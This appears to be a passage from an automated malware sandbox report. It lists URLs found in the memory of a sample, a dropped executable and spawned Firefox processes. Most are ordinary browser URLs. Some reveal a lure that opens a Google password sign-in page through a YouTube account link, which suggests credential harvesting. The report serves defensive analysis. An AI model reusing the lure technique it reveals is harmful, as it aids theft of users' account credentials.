Source: firefox.exe, 0000001B.00000002.3124935486.000002550B992000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesstartMigration
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationSetting
Source: 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgpictureinpicture.settingsaccount-connection-disconnectedhttps://screensho
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001B.00000002.3037710941.0000025505945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507CD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3168469496.00001C9FBA704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3170995539.000030CEEEC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.0000025509303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171740399.0000331855D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3168469496.00001C9FBA704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A0A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.0000025509303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000003.2170327401.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3086777923.0000025508790000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885518412.0000025507B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2886400929.0000025507B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2884833153.0000025508100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885905066.0000025507B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171740399.0000331855D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171740399.0000331855D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: file.exe, 00000000.00000003.2170327401.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2126652942.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126806636.0000000000D24000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126603283.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126725116.0000000000CF3000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 09d417a7c4.exe, 0000000B.00000003.2772790381.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2773045040.000000000142A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-
Source: file.exe, 00000000.00000003.2126603283.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2126652942.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126806636.0000000000D24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learninga
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171740399.0000331855D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: file.exe, 00000000.00000003.2141362319.0000000005769000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141309506.000000000576C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141466478.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787827086.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787926502.0000000005D87000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2788192740.0000000005D87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 0000001B.00000002.3168469496.00001C9FBA704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.000002550741D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001B.00000003.2936993382.000002551030A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3140692267.00000255104B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2929941609.000002551021C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001B.00000002.3037710941.0000025505945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2886400929.0000025507B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2884833153.0000025508100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885905066.0000025507B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2141362319.0000000005769000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141309506.000000000576C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141466478.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787827086.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2787926502.0000000005D87000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2788192740.0000000005D87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/Failed
Source: 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3086777923.0000025508790000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885518412.0000025507B3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3037710941.0000025505945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2886400929.0000025507B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2884833153.0000025508100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3138012152.000002551012A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3140692267.00000255104B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A0A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2885905066.0000025507B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3140692267.00000255104B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171740399.0000331855D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171740399.0000331855D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001B.00000002.3090601585.0000025508DA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3152189016.000002557F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171504335.0000328611F04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3037710941.0000025505931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3146705531.0000025578211000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.00000255093AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001B.00000003.2960052954.0000025509663000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2963561397.0000025509656000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2966789542.00000255096DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2170041257.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3107641537.000002550972A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/intervention-update-refresh-confirmresource:///modules/UrlbarTok
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2170041257.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3107641537.000002550972A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3150564022.000002557F140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2170041257.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2819535440.0000000005E63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3119712014.000002550A939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3152189016.000002557F2D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3163874146.000002557FBAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3168469496.00001C9FBA704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A0A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.0000025509303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: file.exe, 00000000.00000003.2126603283.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2772760148.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000003.2911872105.0000000001053000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2950222857.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3168469496.00001C9FBA704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3051193396.0000025507A16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A0A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.0000025509303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3171740399.0000331855D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001B.00000002.3037710941.0000025505945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3168803607.0000223F7B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3136304541.0000025510018000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082366027.0000025508465000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3120468368.000002550AA8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001B.00000002.3142094936.0000025510A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.000002550741D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.000002550744C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3120468368.000002550AABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001B.00000002.3090601585.0000025508D5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3146705531.0000025578203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3107641537.000002550977F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3142094936.0000025510AE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3136304541.0000025510095000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3146705531.0000025578268000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.000002550741D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3145288571.0000025577F39000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3146705531.0000025578211000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.000002550744C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3145517592.0000025577F70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3037710941.000002550598B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3145288571.0000025577F30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3146705531.000002557825D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3037710941.00000255059C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3108863668.0000025509894000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.2869479477.000001E49ADDA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2882540470.000001A8E0A0F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3145288571.0000025577F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd_setSearchProviderIn
Source: firefox.exe, 0000001B.00000002.3146705531.0000025578203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdu
